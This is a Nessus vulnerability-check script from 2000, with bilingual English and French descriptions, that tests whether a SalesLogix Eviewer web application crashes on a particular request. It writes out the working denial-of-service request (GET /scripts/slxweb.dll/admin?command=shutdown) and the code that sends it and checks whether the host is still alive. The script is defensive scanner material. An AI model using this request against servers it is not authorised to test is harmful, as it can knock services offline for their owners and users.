# # This script was written by Renaud Deraison # # See the Nessus Scripts License for details # if(description) { script_id(10361); name["english"] = "SalesLogix Eviewer WebApp crash"; name["francais"] = "Déni de service SalesLogix Eviewer WebApp"; script_name(english:name["english"], francais:name["francais"]); desc["english"] = "It was possible to crash the remote server by requesting : GET /scripts/slxweb.dll/admin?command=shutdown A cracker may use this flaw to crash this host, thus preventing your network from working properly. Solution : Remove this CGI Risk factor : High"; desc["francais"] = "Il a été possible de faire planter la machine distante en faisant la requète : GET /scripts/slxweb.dll/admin?command=shutdown Un pirate peut utiliser ce problème pour faire planter cette machine, empechant ainsi votre réseau de fonctionner correctement. Solution : enlevez ce CGI. Facteur de risque : Elevé"; script_description(english:desc["english"], francais:desc["francais"]); summary["english"] = "Crashes Eviewer"; summary["francais"] = "Fait planter Eviewer"; script_summary(english:summary["english"], francais:summary["francais"]); script_category(ACT_DENIAL); script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison", francais:"Ce script est Copyright (C) 2000 Renaud Deraison"); family["english"] = "Denial of Service"; family["francais"] = "Déni de service"; script_family(english:family["english"], francais:family["francais"]); script_require_ports("Services/www", 80); exit(0); } # # The script code starts here # port = get_kb_item("Services/www"); if(!port)port = 80; if(get_port_state(port)) { cgi = "/scripts/slxweb.dll/admin?command=shutdown"; soc = open_sock_tcp(port); start_denial(); is_cgi_installed(cgi); sleep(5); alive = end_denial(); if(!alive){ security_hole(port); set_kb_item(name:"Host/dead", value:TRUE); } close(soc); }